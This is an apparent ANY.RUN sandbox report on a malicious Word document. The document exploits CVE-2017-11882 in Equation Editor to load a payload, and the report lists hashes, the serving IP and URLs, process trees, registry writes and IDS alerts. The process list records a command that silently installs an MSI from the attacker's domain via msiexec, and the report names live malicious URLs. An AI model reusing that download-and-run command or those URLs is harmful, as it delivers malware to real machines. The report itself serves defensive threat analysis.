analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://amazonvietnampharma.com.vn/l/css/css.doc

Full analysis: https://app.any.run/tasks/46ac65ec-78c0-4b38-bc83-db03d4592091
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 09:59:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
exe-to-msi
Indicators:
MD5:

B8656D933E1B2913E492318164EE9D0A

SHA1:

F4E39168525AD2A5EE29D033C7202D107BE1BCCE

SHA256:

546AC2B3A405535E57BDB08485A6AF39C23A3D8BB347489EBEABD3837E32E037

SSDEEP:

3:N1KfWt05Ld2qUBAdn:CECLd2Z8n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3220)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 4056)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3752)

  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2232)

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2232)

    • Application launched itself

      • WINWORD.EXE (PID: 2232)

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3220)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3752)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3752)

  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 2972)

    • Application launched itself

      • iexplore.exe (PID: 2972)

    • Creates files in the user directory

      • iexplore.exe (PID: 3248)
      • iexplore.exe (PID: 2972)
      • WINWORD.EXE (PID: 2232)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3248)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2232)
      • WINWORD.EXE (PID: 2776)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3248)

    • Application was crashed

      • EQNEDT32.EXE (PID: 3220)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3752)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3752)

    • Application was dropped or rewritten from another process

      • MSIA75E.tmp (PID: 2488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
9
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msia75e.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3248"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2972 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2232"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2776"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3220"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
4056cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2620msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3752C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2488"C:\Windows\Installer\MSIA75E.tmp"C:\Windows\Installer\MSIA75E.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 044
Read events
1 566
Write events
462
Delete events
16

Modification events

(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{239FFDF5-342D-11E9-AA93-5254004A04AF}
Value:
0
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
3
(PID) Process:(2972) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E3070200020013000A0000000A000200
Executable files
2
Suspicious files
27
Text files
22
Unknown types
8

Dropped files

PID
Process
Filename
Type
2972iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2972iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCA.tmp.cvr
MD5:
SHA256:
2232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{D45CD8E0-487F-49AF-919B-B171463A4D7D}
MD5:
SHA256:
2232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{09C4CF92-4453-41CC-A84C-6DE53000419E}
MD5:
SHA256:
2972iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF9AD787E58ABB2572.TMP
MD5:
SHA256:
3248iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\css[1].doctext
MD5:C450C7DFC7572C12D6F3A86126A37AC9
SHA256:166AD91951FBFCC8BADF51A48BA6E385D78975368B8061F202D05ECAFA9E971C
2232WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:FCFD66A4F0B5F876D26D1D8761B5B42E
SHA256:6E55A3C8715292F2E5D339B8C96A1F9DAD7683FC9D96EC3F94A005E1C778DFB0
2232WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{99DE1860-0A84-44B9-8077-101F384D6325}.FSDbinary
MD5:CE416459082281A991E357478A324D64
SHA256:B434CBFD1EF8B4F1A5CCAEB6A6EEB348AEE9BB5771CFD60B5145273249DF7954
2232WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:59EE13206A32F83F8D91383B034FC159
SHA256:2ED161260D581C5AA4D7483A7CE6B0D6EC1D61EAA0F76BCB522AB287BEB0FB52
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
9
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2232
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
3248
iexplore.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2232
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2232
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
3752
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baba.msi
VN
executable
656 Kb
suspicious
2232
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2232
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2232
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2232
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
compressed
56.4 Kb
suspicious
976
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css
VN
html
230 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2972
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3248
iexplore.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3752
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2232
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
976
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious

Threats

PID
Process
Class
Message
3752
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3752
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3752
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://amazonvietnampharma.com.vn/l/css/css.doc